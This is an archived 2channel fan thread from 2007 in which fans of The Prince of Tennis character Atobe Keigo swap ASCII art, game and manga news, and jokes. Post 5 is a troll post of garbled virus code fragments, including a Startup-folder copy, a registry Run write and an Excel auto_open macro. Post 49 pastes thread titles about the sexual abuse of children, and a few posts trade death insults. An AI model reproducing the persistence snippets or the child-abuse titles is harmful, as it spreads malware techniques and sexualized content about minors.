2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【宿敵よ】テニプリ 跡部景吾に酔うスレ6日目【強くあれ!】

1 :名無しかわいいよ名無し:2007/11/16(金) 12:33:06 ID:OeBpQsIT
ここはテニスの王子様のキング跡部景吾タンに(;´Д`)ハァハァするスレッドです

〜このスレの大まかなルール〜
・sage進行。荒らしはスルー
・早売りのネタバレ禁止
・他キャラ、作者叩きは禁止
・過度のドリーム妄想・腐女子妄想は禁止
・中の人に関する話題は該当スレで
・次スレは>>980を取った人が建てる
・(;´Д`)ケゴタン ハァハァ

過去スレ
【部長の選択】テニプリ 跡部景吾に酔うスレ5日目【氷帝の勝利】
http://anime2.2ch.net/test/read.cgi/cchara/1179401836/
【気を失って】テニプリ 跡部景吾に酔うスレ4日目【尚君臨】
http://anime2.2ch.net/test/read.cgi/cchara/1165776930/
【氷の】テニプリ 跡部景吾に萌えるスレ3【帝王】
http://comic6.2ch.net/test/read.cgi/cchara/1157124628/
【テニスの王様】跡部景吾に萌えるスレ2【KING!】
http://comic6.2ch.net/test/read.cgi/cchara/1144343748/
【破滅への】結論。跡部はエロすぎる【ロンドン】
http://comic6.2ch.net/test/read.cgi/cchara/1093473731/

2 :名無しかわいいよ名無し:2007/11/16(金) 12:45:08 ID:U+z2iXpq
>>1
ほうら乙!

新スレでもはりきってケゴタン(;´Д`)ハァハァ

3 :名無しかわいいよ名無し:2007/11/16(金) 13:01:05 ID:M+M0i36M
乙で〜す。
新スレでもケゴタン(*´Д`)ハァハァ

4 :名無しかわいいよ名無し:2007/11/16(金) 18:59:10 ID:evHQKA5O
>>1
  〃⌒⌒ヽ,
  彡从((`')ヾ
  つd*`∀´) <俺様の乙に酔いな!
  \.y ⊂ )
  /    \
  し. ̄ ̄ ̄\)

新スレなのでケゴタン(;´Д`)ハァハァ初めをしておきます


5 :名無しかわいいよ名無し:2007/11/16(金) 18:59:41 ID:D9QERQGj
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :名無しかわいいよ名無し:2007/11/16(金) 23:05:50 ID:d5Y6oKtl
前スレ1000GJ
adobeかわいいよadobe

7 :名無しかわいいよ名無し:2007/11/16(金) 23:31:01 ID:SELkUdBL
前スレのケゴタンAAすごくかわいい
職人さんGJ

8 ::2007/11/16(金) 23:33:29 ID:SELkUdBL
あ、991の馬に乗って剣をもっているケゴタンのことです

9 :名無しかわいいよ名無し:2007/11/16(金) 23:40:19 ID:evHQKA5O

    __∧ 〃⌒⌒ヽ,
   (_  ・ ミソ((`'))从ミゞ
      \ ミ,.(`∀´*b,/
      (  (    つ╂───
     /   / /
     \(/(__) Y彡
          | | \  ヽ
          ( (  丿
          / / /
           /_/_/
可愛いので連れ去ってきたこの馬はエリザべートだろうかw

10 :名無しかわいいよ名無し:2007/11/16(金) 23:40:37 ID:vUXYkR3u
前スレ999と1000が13秒差でちょっと吹いたw

11 :名無しかわいいよ名無し:2007/11/17(土) 00:20:26 ID:+y3ucCv6
>>9
シルバーミーティア号かもしれん
跡部家の牧場にはまだ我々が名前を知らないお馬さんがたくさんいそうだからわからんなw

12 :名無しかわいいよ名無し:2007/11/17(土) 03:07:16 ID:jLJa2/JC
跡部の影響でアフガンハウンド飼うことにした自分は重症w



13 :名無しかわいいよ名無し:2007/11/17(土) 05:52:29 ID:ZIQMsI9F
>>10
荒らしには1000は絶対取らせない!って感じで
ずっと待ち構えてたのかな?GJです

14 :名無しかわいいよ名無し:2007/11/17(土) 17:45:52 ID:2I/fPy3p
OAVの断髪式みたよ。
跡部……かっこよかったよ。


15 :名無しかわいいよ名無し:2007/11/17(土) 21:58:40 ID:s33Uxrlo
>12アフガンってあの大型犬かww
あれ飼ってる人はお金持ちのイメージがある

馬はエリザベートでアフガンはマルガレーテ確か猫も飼ってた気がする
公式で名前発表されてた?


16 :名無しかわいいよ名無し:2007/11/17(土) 23:56:23 ID:oF6TxUtY
猫の名前は出てないと思う
マルガレーテかわいかったなあ久々に見たくなってきた

17 :名無しかわいいよ名無し:2007/11/18(日) 13:19:31 ID:fVMGTKaQ
>>15
こち亀の両さんですら、「なんて高貴な犬なんだ」と思わず頭下げてしまうくらいだからねえ

18 :名無しかわいいよ名無し:2007/11/18(日) 13:54:45 ID:hNdFqNwR
ラブプリで出たときはシュールすぎて吹いたwww

19 :名無しかわいいよ名無し:2007/11/18(日) 15:52:35 ID:XEjkTUU4
あ!わんわんだ!を思い出した

20 :名無しかわいいよ名無し:2007/11/18(日) 20:27:01 ID:yqnChNGB
わんわん懐かしい去年だよね
その時使ったAAをひっぱりだしてみた


    γ''"""ヽ、
    / / ゚ ▼)
    し'(`.・ω・) <あ〜っ!わんわんだっ
   ノ|(ノ  |)
  ∠,,人,,_,,ノ
     U"U



21 :名無しかわいいよ名無し:2007/11/18(日) 20:53:04 ID:kk4Z5h0A
>20テラカワユスwww
ワンワンケゴタン(;´Д`)ハァハァ


22 :名無しかわいいよ名無し:2007/11/18(日) 21:02:06 ID:uLJKJha3
     r'ニ;v'ニ;、
     _,!_(9i (9i:、
  /  `ヽ,. ┘ヽ     ふむふむ・・・
. i ′′       }     なるほどなるほど・・・
  l、      、   ,!
   ヽ.____,ノ` ,∠!
           r'ニ;v'ニ;、
 r、r.rヽ.      _,!_(9i (9i:、
r |_,|_,|_,|    /  `ヽ,. ┘ヽ
|_,|_,|_,|_,|.    i ′′       }    で?っていう
|_,|_,|_人 (^ i . l、      、   ,!
| )   ヽノ |  ヽ.____,ノ` ,∠!
|  `".`´  ノ /i/ l\ ー .イ|、
   入_ノ /  | l   ̄ / | |`
 \_/
   /

23 :名無しかわいいよ名無し:2007/11/18(日) 21:37:04 ID:rIO+LDqu
>>9
>>20
かわいすぎるwww

ごめん…わんわんっていつ言ったんだっけ?
思い出せそうで思い出せないorz

24 :名無しかわいいよ名無し:2007/11/18(日) 21:37:20 ID:8o5svBTy
ヨースター島の住人乙


なんかクロスウィズユーが脳内を流れてる。しかもこの辺ばかり
♪納得ゥなーんてでっきっなーい 世間のルールっをー
 塗ーりつぶっしってー 変えーてみっせーる

25 :名無しかわいいよ名無し:2007/11/18(日) 21:49:04 ID:kk4Z5h0A
>23ラジプリの言わねぇコーナー

26 :名無しかわいいよ名無し:2007/11/19(月) 11:34:52 ID:mZoQOHTq
>>24
おまいのせいでクロスウィズユーの脳内再生が止まらない!

27 :名無しかわいいよ名無し:2007/11/19(月) 12:10:34 ID:cE3M5xNG
>>26
良かったじゃないか!脳内がケゴタンに占領されて!

28 :名無しかわいいよ名無し:2007/11/19(月) 20:13:26 ID:1SitiOQw
跡部さまって、見ててイタイです。
例えるなら大人っぽい口調を覚えて、
みんなの前で得意げに披露しちゃう
幼稚園児か低学年の子供みたいな?
もー次は何をやらかしてしまうんでしょうか???
頼むから黙っていてくれ〜〜〜もうたまらん


29 :名無しかわいいよ名無し:2007/11/19(月) 20:33:18 ID:FnbmO8Dl
最近、跡部さまがでてこない……やば、禁断症状

30 :名無しかわいいよ名無し:2007/11/19(月) 20:53:23 ID:1SitiOQw
モブの中でいいよ・・・。
なんかまたイタイことやっちゃうから。
って私アンチじゃないっすよ。
だいたい樺地が悪い。なんでもウスウスって。
たまには反抗してみればいいのに・・・。

31 :名無しかわいいよ名無し:2007/11/19(月) 21:41:39 ID:cE3M5xNG
>>30
>だいたい樺地が悪い。なんでもウスウスって。
>たまには反抗してみればいいのに・・・。

悪いって言い方はどうかと思うぞ…同じような事が仕事内容なセバスチャン及び執事の方々にも謝れ
そして反抗したらそれはそれで樺地っぽくない

32 :名無しかわいいよ名無し:2007/11/19(月) 21:44:58 ID:cBlRJSA2
あー、こんな奴の人気出るとか日本オワタ/(^O^)\ 頭の中
とんでるとしか思えない痛い性格乙www 実際いたらす
ベリまくりな可哀想な部長さんでしかないだろ確実にww
大口叩いて結局坊主とかwwww 正直こいつ好きな奴の
好み疑うね。てゆうか三次元に目向けろって話だなwww
きっとこれからも痛さ振り撒いて生きるんだろうなこいつ



33 :名無しかわいいよ名無し:2007/11/19(月) 23:06:32 ID:J74zNvfL
>32
歪んだ愛…だがそれも愛、か…。

34 :名無しかわいいよ名無し:2007/11/19(月) 23:13:35 ID:q/Ilw+NL
>30はどんな展開をのぞんでるんだ
痛いからモブでいいっていうのは納得できない

あと冗談かも試練がケゴタンスレで樺地を悪く言わないでほしいな…
もちろん他のキャラもだけど


>29ケゴタンの出現はかなりランダムだよ
1年でないかと思えば3週続けてでることもあるから
油断せずに待とう


35 :名無しかわいいよ名無し:2007/11/19(月) 23:20:17 ID:v5FNqRGN
>33お触り禁止デス><

36 :名無しかわいいよ名無し:2007/11/20(火) 00:33:47 ID:SnXWwBlM
>>33
いや>>32の愛は真っ直ぐだろ、縦方向に

37 :名無しかわいいよ名無し:2007/11/20(火) 00:34:44 ID:F1H2JTV9
だよなw上手いと思ったw

38 :名無しかわいいよ名無し:2007/11/20(火) 19:31:31 ID:gDWnXxFb
>32
ああ、自分の他にもそう思ってた人いたんだwwはっきり言ってテニスで
いちばん嫌いなキャラwwwwこいつが出ると他のキャラが目立てないんだよね
しかもいきなり出てきては「なぁ、樺地」だもんなww
ていうか、こいつ本当に大丈夫か?樺地以外に友達いるの?無駄に格好つけて
るし、まさに厨だよね


こうですか?わかりません><

39 :名無しかわいいよ名無し:2007/11/20(火) 22:06:26 ID:Rh2x6JnB
あれ?なんでケゴタンアンチがここにいるんでつか?
とは言え、みんな素直になれないだけで愛情の裏返しなんだよね?
べつにそれは否定してないけど…それも一つの愛のかたちだ!と自分は思ってるし!
愛は人の数ほどあるもんね!なんだかんだでこのスレ、ケゴタンへの想いで溢れてるよ。
しかし、こんなにも長い間、ケゴタン(;´Д`)ハァハァすると思ってなかったわw
てか、もうケゴタン(;´Д`)ハァハァして何年だ?ケゴタンに出逢ってからは、
るんるん気分な毎日で楽しいお!(・∀・)


みんな素直に!><

40 :名無しかわいいよ名無し:2007/11/20(火) 23:57:12 ID:WcdLiO6e
>>39が一番見てる側に優しい
縦読み用の嘘とはいえ、荒れてる様な内容はあまり見たくなかったよ…orz

41 :名無しかわいいよ名無し:2007/11/21(水) 08:54:51 ID:E4trqFjm
>>40ゴメンヨ自分の心と正反対のことを書いたんだ…
見直して自分でもちょっと落ち込んだorz

42 :名無しかわいいよ名無し:2007/11/21(水) 14:02:55 ID:0XaUjwW0
>>41
かわいい奴w
つまりはケゴタン大好きってことですねww
のべられてる内容がアンチっぽいけど若干の違和感を感じてたんだよね
はっきり言って>>36の発言を見るまでは縦読み気づかなかったけど…
ああ、一発で気付けなくてちょっと悔しい

ところでDSゲームの特別仕様買う予定の人いる?特製DSケースとか付いてきてやたら高額のやつ
べつにいいかな、とは思ってたんだけどやっぱ迷うんだよね…

43 :名無しかわいいよ名無し:2007/11/21(水) 15:59:18 ID:JSmWrUFV
とりあえず買う
買わないで後で後悔したくないし

44 :名無しかわいいよ名無し:2007/11/21(水) 16:43:26 ID:ePjGmsOp
予約する
一万ちょいで色々ついてくるし
次回ゲームへの投資にもなるかもしれない

45 :名無しかわいいよ名無し:2007/11/21(水) 17:32:38 ID:uuA2uHdn
シリコンカバーが気になるけどまだ迷ってる

46 :名無しかわいいよ名無し:2007/11/21(水) 18:45:08 ID:xwpuz1Tg
高額セット買う人けっこういるみたいでちょっとびっくり
みんな金持ちだな
私はゲーム本体だけでいいや使い道に困るかもしれないし

47 :名無しかわいいよ名無し:2007/11/21(水) 18:59:15 ID:pz5YLrm6
自分もソフトだけ買うよ
正直個人的にかなり微妙

48 :名無しかわいいよ名無し:2007/11/22(木) 10:07:40 ID:TYX8GNcE
あげ

49 :名無しかわいいよ名無し:2007/11/22(木) 12:20:04 ID:oZJeQrIN
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
小学生の女の子を妊娠させてみたい [独身男性]
小学生とセックスしたい! [特撮!]
小学生援助交際ビデオ流出! [独身貴族]
小学生のレイプDVDがどうしても欲しいんです。 [ちくり裏事情]
【比呂士デス】テニスの王子様305【試合が無いとデス】 [週刊少年漫画]


ちょwwwwwだれwwwwwwwwww

50 :名無しかわいいよ名無し:2007/11/22(木) 18:22:43 ID:dwkV/oP3
今度出るブロマイドのケゴタンの絵柄って、本誌に載ってた?
ゲームスレで見つけてハァハァしたので、ケゴタンの所だけくり抜いてみた(*´Д`)
もし、まだ見てない人がいたらドゾー

http://t.pic.to/kemtm

51 :名無しかわいいよ名無し:2007/11/22(木) 18:23:17 ID:gq/dtGZT
前にも出てたけどウオッチャーに荒らされてるらしい
おすすめ2ちゃんねるって普段みれないけどなー
なんの意味があるんだ

書きこみついでに(;´Д`)ケゴタン ハァハァ

52 :名無しかわいいよ名無し:2007/11/22(木) 18:36:23 ID:gq/dtGZT
>>50GJ!GJ!(*゚∀゚)=3
なんなんだこのケゴタンの表情は!実にけしからん


53 :名無しかわいいよ名無し:2007/11/22(木) 20:03:29 ID:0+d2WeDm
GJ!

54 :名無しかわいいよ名無し:2007/11/22(木) 21:17:49 ID:Rv8TrrJC
>>50
乙乙乙
なんというエロい顔
珍しく作画がいい感じ

55 :名無しかわいいよ名無し:2007/11/23(金) 01:05:56 ID:MHQAS8qO
>>51
週少のスレみたいに
「専ブラも使えないバカでこんな痛い奴らがいるwwwwwwwwwwwwwwww」
ってpgrしたり叩いたりしたいだけの単なる煽りかアンチ

56 :名無しかわいいよ名無し:2007/11/23(金) 01:36:32 ID:+nnKEFww
これはウオッチャーでしょ
他のキャラスレでも同じおすすめリンクされてるとこあるし
何でそんなに過敏なんだ…

57 :名無しかわいいよ名無し:2007/11/23(金) 21:38:37 ID:Sxi5cJYK
寒すぎる

こんな日は
ケゴタン(*´д`*) ハァハァ

58 :名無しかわいいよ名無し:2007/11/23(金) 22:39:08 ID:mKNohnga
DSで早くケゴタンを転ばせたい(;´Д`)ハァハァ
忍足や乾みたいに面白くこけてくれるんだろうか…
ゲームのケゴタンはいつもクールだから想像できないよ

59 :名無しかわいいよ名無し:2007/11/24(土) 15:04:18 ID:93Fo008F
きっとかなり冷たい目で見られるよ
罵倒でもいいかも
ケゴタンに(#゚Д゚) ゴルァ!!と怒鳴られたい(;´Д`)ハァハァ


60 :名無しかわいいよ名無し:2007/11/24(土) 17:03:24 ID:uqkWTmnl
早売りバレによると40.5の描き下ろしは跡部

今から(;´Д`)ハァハァ

61 :名無しかわいいよ名無し:2007/11/24(土) 17:28:37 ID:S2wUCtPV
あの二年前がどうとかいうやつ?
まさか跡部が来るとは思わなかった
やべえ嬉しい

62 :名無しかわいいよ名無し:2007/11/24(土) 19:57:08 ID:l4+ZF+1L
マジすか…!これで40.5買わずにいらいでか!

63 :名無しかわいいよ名無し:2007/11/24(土) 22:03:15 ID:VVAKkeCp
転ばしたら怒られそうだw
ファンディスクTVCMでケゴタンの映像もチラっと流れた
久し振りにTVでみたケゴタン(;´Д`)ハァハァ

64 :名無しかわいいよ名無し:2007/11/24(土) 22:43:53 ID:Ugg6MtW0
ちょww今、100曲マラソンの公式サイトに飛んだら、マイク持ったケゴタンが出てきたんだがwww
前に行った時は越前だったのに…何日か置きにキャラが変わるのかな(;´Д`)ハァハァ
ケゴタンの美声に酔いたいよ(;´Д`)ハァハァ

65 :名無しかわいいよ名無し:2007/11/24(土) 23:05:33 ID:VVAKkeCp
ちょw心臓飛び出そうになったカラーでみれて嬉しい
>>64
教えてくれてありがd

66 :名無しかわいいよ名無し:2007/11/25(日) 04:03:18 ID:BIpwhb5Z
>65
見れなかった…orz
もう今日は良くない日!><

67 :名無しかわいいよ名無し:2007/11/25(日) 12:15:35 ID:zPINtDai
自分も見れなかった
ヤッパリ日置かもね
明日も見てみるわ

68 :名無しかわいいよ名無し:2007/11/25(日) 20:40:22 ID:dvXeGViL
今日越前もケゴタンも両方見れたから日置ではないんじゃないかな

69 :名無しかわいいよ名無し:2007/11/25(日) 22:01:11 ID:MvEf2N8n
ニュースからマラソンサイト→越前
テニスボールからマラソンサイト→(*´д`)ケゴタンハアハア



だと思った

70 :名無しかわいいよ名無し:2007/11/25(日) 22:51:42 ID:NZAL4sm1
ちょ、>>69d!
100曲のページを直接ブクマしてるからずっとケゴタンドコー?と思ってたが
ようやく見方がわかったわw

71 :名無しかわいいよ名無し:2007/11/26(月) 01:50:40 ID:+jkMyaq8
跡部の苦手なものってなに?

72 :名無しかわいいよ名無し:2007/11/26(月) 06:48:13 ID:TCN6l2Gj
>>71
ラジプリでのマイペース青学陣くらいかと。まぁ「中の人じゃん」ってツッコミは無しの方向で

73 :名無しかわいいよ名無し:2007/11/26(月) 09:13:24 ID:KfpfXzD2
ゲゴタンに苦手なモノがあるかわからんが
勝手に虫は苦手だと
思ってる。

74 :名無しかわいいよ名無し:2007/11/26(月) 09:40:47 ID:Pyaq7yY6
>>71
風の強い日とか
台風の日とか
ハリケーンの日とか

75 :名無しかわいいよ名無し:2007/11/26(月) 14:12:42 ID:8JmV5Fw8
庶民的な生活?は苦手なんじゃない?
切符買うとか、エスカレーター乗る(東京は左)とか
コンビニおにぎりのやぶり方?とか
ケゴタンからすると常識外のことw

でもなぜかカラオケの曲の予約とかは早そうだよ!ケゴタン!(;´Д`)

76 :名無しかわいいよ名無し:2007/11/26(月) 14:28:02 ID:KfpfXzD2
エスカレーターに
乗るタイミング





やべぇ…
ゲゴタンかわいいよゲゴタンWW

77 :名無しかわいいよ名無し:2007/11/26(月) 16:40:34 ID:7PU5TnJr
>>75
>庶民的な生活
ラジプリで切符やカップ麺に苦戦してたケゴタンを思い出したww

78 :名無しかわいいよ名無し:2007/11/26(月) 16:49:37 ID:2hEP9UvG
>77
かやくを爆発物だと思ったりなw

79 :名無しかわいいよ名無し:2007/11/26(月) 17:28:39 ID:TSkaFSqH
ラーメン屋での支払いも苦手だよね

80 :名無しかわいいよ名無し:2007/11/26(月) 18:43:01 ID:cA8pjpk8
部活帰りのコンビニ買い食いでケゴタンの初パピコを妄想
宍戸さんかジローに庶民の味を教育されてるといい
ケゴタン可愛いよケゴタン

81 :名無しかわいいよ名無し:2007/11/26(月) 18:48:15 ID:fLQr1Zn+
エスカレーターでまごまごしてたら可愛いなあ
…と萌えた後、お偉い方々が使うような建物にもエスカレーターはあると気づいた
てか空港なんかで使い慣れてそう

バスに乗ったら乗車券を取るって知らなそう
そして平気で最高金額を払うケゴタン

82 :名無しかわいいよ名無し:2007/11/26(月) 19:44:52 ID:aqcAxC0x
ケゴタンの初めてのおつかいを見てみたい

83 :名無しかわいいよ名無し:2007/11/26(月) 20:09:45 ID:vZ+tuPmE
なんとなくなんだけど、ケゴタンは現金をあまり持ち歩いてなさそうなので、
バスとか小銭必要になるとあたふたしてそうな予感が…

普段は運転手付のリムジンで登下校だろうし(勝手な予想)

84 :名無しかわいいよ名無し:2007/11/26(月) 20:42:12 ID:neHm5IAi
>69亀だけどトン

テニスボールはランダムでリョーマかケゴタンが出てくる
トップはリョーマ固定だった

85 :名無しかわいいよ名無し:2007/11/26(月) 20:55:00 ID:neHm5IAi
多分両替機の存在を知らないんではないだろうか
周りの人に教えられて両替機初体験のケゴタン

86 :名無しかわいいよ名無し:2007/11/26(月) 21:12:47 ID:7PU5TnJr
>>78
そうそうww
あのシリーズは面白かった

>>79
カード決済が出来なかっただけだから苦手とは違う気がw



87 :名無しかわいいよ名無し:2007/11/27(火) 02:07:22 ID:We6FlYDB
コンビニのおにぎり絶対無理だwwwやらせたいwww
可愛いなあ〜

88 :名無しかわいいよ名無し:2007/11/27(火) 08:24:22 ID:m2H8Ta0l
>>87
開け口がわからなかったり開けられても海苔やぶったりしてそうだ

89 :名無しかわいいよ名無し:2007/11/27(火) 11:56:18 ID:wR4zWEXI
やたら「チッ」とか「クソッ」とか言いながら開けてそうw

90 :名無しかわいいよ名無し:2007/11/27(火) 13:04:39 ID:BGQOk/9H
なんだ…このおにぎりはっっ!海苔がフィルムの間に挟まったままだぞ!
いったいどうゆうことだ!

        ,.-、      
(`.・ω・)ノ (,,_)  ■
 
 

91 :名無しかわいいよ名無し:2007/11/27(火) 15:41:24 ID:dMd9eNE0
ゲゴタンかわいいよゲゴタンWWW

92 :名無しかわいいよ名無し:2007/11/27(火) 18:03:57 ID:m2H8Ta0l
>>91
御名前が大変なことにw
とにかく落ち着けww

93 :名無しかわいいよ名無し:2007/11/27(火) 19:15:52 ID:2ycbLeF1
ワロスw

94 :名無しかわいいよ名無し:2007/11/27(火) 22:11:16 ID:ZW626UJn
>>90
のりが外れてるw頑張れケゴタン

95 :名無しかわいいよ名無し:2007/11/28(水) 20:08:43 ID:UlRpoxda
DSでもマラソン招待イベあるのか
ランニングケゴタン(;´Д`)ハァハァ

96 :名無しかわいいよ名無し:2007/11/28(水) 22:07:34 ID:G/8xLqmQ
今年も来年もケゴタンもといコナミに踊らされるのかorz
氷の世界使えるといいなー

97 :名無しかわいいよ名無し:2007/11/28(水) 22:33:25 ID:RhmiL389
       *'``・* 。
        |     `*。
       ,。∩      *    ほうら踊れ!
      + (`.・ω・´) *。+゚
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚





98 :名無しかわいいよ名無し:2007/11/28(水) 22:49:44 ID:phJEw/ZS
ああああっWWWW

ゲゴタンとか言って
ごめんねケゴタン…_| ̄|○

99 :名無しかわいいよ名無し:2007/11/28(水) 23:12:18 ID:bDZdy/Aw
俺様は全然気にしてないぜ?

(・^ω^#)ビキビキ

100 :名無しかわいいよ名無し:2007/11/28(水) 23:46:51 ID:c+MO9XjB
>>99
ケゴタン血管が浮き出てるよケゴタンww

101 :名無しかわいいよ名無し:2007/11/29(木) 00:35:49 ID:R450eXwc
>95DSのソフトもアニメイトで購入したら
100曲マラソンのチケットに応募できるってことだよね?

それを聞いてアニメイトでソフトを買うことにしました。
ケゴタン(;´Д`)ハァハァ

102 :名無しかわいいよ名無し:2007/11/29(木) 03:51:29 ID:XUdN6fGp
しね

103 :名無しかわいいよ名無し:2007/11/29(木) 05:43:26 ID:0c5jei/q
てめーが氏ねよクソが

104 :名無しかわいいよ名無し:2007/11/29(木) 08:21:32 ID:lln3F/6p
スルーしようぜ

105 :名無しかわいいよ名無し:2007/11/29(木) 12:52:50 ID:rNy8rVAR
>>101
パスワードがソフトに同封されてる形だからどこで買ってもおk
アニメイトの方のキャンペーンとは関係ないみたい

今日もケゴタン(;´Д`)ハァハァ

106 :名無しかわいいよ名無し:2007/11/29(木) 13:51:47 ID:Tmc47/hP
>103
おまえがシネ

107 :名無しかわいいよ名無し:2007/11/29(木) 21:21:09 ID:R450eXwc
>105トン
それでも当たる気がしない
アニメイトで3000円以上ってのも結構きついしな

どうしようケゴタン(;´Д`)ハァハァ


108 :名無しかわいいよ名無し:2007/11/29(木) 22:36:37 ID:y36K/rGg
倍率とか想像がつかないけどやっぱり凄いのかね
この時期になるとWILLが聴きたくなるケゴタン(;´Д`)ハァハァ

109 :名無しかわいいよ名無し:2007/11/29(木) 23:22:19 ID:lln3F/6p
もうケゴタンのwill
聞いた俺は勝ち組

110 :名無しかわいいよ名無し:2007/11/30(金) 00:43:57 ID:hpOIyOVK
>>107
自分は片っ端から買うのを我慢していたCD類を買っていくよ

111 :名無しかわいいよ名無し:2007/11/30(金) 14:19:07 ID:3QsxaRyj
ttp://hikaru.blogzine.jp/dress_you_up/2007/11/post_db20.html

ケゴタン家に居そうです
気高くて美しい…ケゴタンみたいだ
ケゴタン(;´Д`)ハァハァ

112 :名無しかわいいよ名無し:2007/11/30(金) 17:08:04 ID:iMkzuIOt
http://books.shueisha.co.jp/search/book_image/978-4-08-874198-7.jpg
40.5発売まであと少し…!!

113 :名無しかわいいよ名無し:2007/11/30(金) 18:40:53 ID:X1a5ayVB
>111 ぬおおおおおおテラカワユスwwww
ぬことヒョウをたして2でわったみたい
確かにケゴタンに似てるよww

>112何故あおり?このケゴタンどこを向いているんだww
早く原寸大でみたいよケゴタン(;´Д`)ハァハァ


114 :名無しかわいいよ名無し:2007/11/30(金) 19:09:08 ID:GRKao+TZ
   。 。
  / /  にっ280万!
( Д )

でも飼ってそうw
ケゴタン家はドーベルマンとかもいそうだ


115 :名無しかわいいよ名無し:2007/11/30(金) 19:09:17 ID:sfr8AhEg
>>112
ちょwwwこりゃまたすごい角度だなwwwwww
何にせよ楽しみだ

116 :名無しかわいいよ名無し:2007/11/30(金) 23:13:57 ID:nSuz+rik
40.5に期待
wktk

117 :名無しかわいいよ名無し:2007/12/01(土) 08:23:16 ID:vpzs/AOq
40.5巻楽しみすぎて
死にそう…

苦しくなってきた…

118 :名無しかわいいよ名無し:2007/12/01(土) 14:54:55 ID:vtUhYiSg
>117そこまで楽しみにしてるのかwwwかわいいな

一年生ケゴタンを見るまで死なないで
あと3日だよ

  ∧_∧
 ( ・∀・) ドキドキ
 ( ∪ ∪
 と__)__)

ところでこのスレは発売日以降のネタばれは禁止?

119 :名無しかわいいよ名無し:2007/12/01(土) 17:10:23 ID:4BN8Ydpz
疑問なんだが、みんなして2年前の1年生ケゴタンって言ってるが
ソースはどこなんだ?
本誌見落としただけなのかな…

120 :名無しかわいいよ名無し:2007/12/01(土) 17:30:51 ID:708x+ZtL
>>118
>ところでこのスレは発売日以降のネタばれは禁止?

発売日「以降」はなんら問題無いと思うぞw
早売りバレは駄目らしいが

121 :名無しかわいいよ名無し:2007/12/01(土) 17:57:46 ID:wMLqw6ex
>>119
いつかの本誌で、たしけのコメント蘭(?)か何かで、
「40.5巻に掲載する、あの学校の入学式シーンを書き下ろしてるよ!」
って、言ってたからじゃないかな?
それで、読みきりがケゴタン中心だって情報が新たに出て、
「それなら、ケゴタンの入学式なのか!←今ココ」って感じだと思う

自分も人づてに聞いた話なので、曖昧でスマン

122 :名無しかわいいよ名無し:2007/12/01(土) 18:47:08 ID:BBY5fImx
そんな…、1年生ケゴタンなんて見たらハァハァの極みで
萌え氏んでしまいそうだよ!
カワイイ!カワイすぐるよ!

ケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァ
ケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァ
ケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァ
ケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァ
ケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァケゴタン(;´Д`)ハァハァ

今のうちに少し萌えを放出しとかないと、ガチで皆萌え氏ぬぜ?

123 :名無しかわいいよ名無し:2007/12/01(土) 20:37:55 ID:tvd+0Ofy
このスレ見てるとケゴタン(;´Д`)ハァハァでゲシュタルト崩壊が起こりそうw
でもケゴタンでもえ死ぬなら本望です

124 :名無しかわいいよ名無し:2007/12/01(土) 22:08:31 ID:u5dZXJCd
2年時は少し髪が短いだけでそんなに変わってなかったけど
1年時はどんな風なんだろうかケゴタン(;´Д`)ハァハァ

125 :名無しかわいいよ名無し:2007/12/01(土) 22:17:36 ID:vpzs/AOq
40.5で萌え氏なないようにケゴタンの免疫
付けようとして原作読んでたら
インフルエンザに
かかった…。

タスケテネエサンタチ…_| ̄|○

126 :名無しかわいいよ名無し:2007/12/01(土) 22:21:56 ID:4BN8Ydpz
>121
d!!
そう言えばそんな事を書いてた気もするな…
ケゴタンのために取りあえず2冊買いは決定したw

127 :名無しかわいいよ名無し:2007/12/02(日) 03:18:58 ID:8JczTG9O
>125
2chなんかせずに寝ろばか

128 :名無しかわいいよ名無し:2007/12/02(日) 04:06:21 ID:6UAzj9RQ
>>127はツンデレ

129 :名無しかわいいよ名無し:2007/12/02(日) 05:46:28 ID:OEfJs4XK
>127
跡部乙

130 :名無しかわいいよ名無し:2007/12/02(日) 23:13:51 ID:QxsmwtUM
いよいよ明後日には中1ケゴタンに会えるのかドキドキ(*´Д`)ハァハァ

131 :名無しかわいいよ名無し:2007/12/03(月) 02:00:18 ID:atwJMS54
さっきコンビニ行ったらジャンプ売ってた

1年ケゴタンの小さいカットが!
蟹に似てるなんて言わないよ、ケゴタン

132 :名無しかわいいよ名無し:2007/12/03(月) 12:44:42 ID:VG1qR348
悪そうな顔してたなw
もう明日になってしまった訳だが
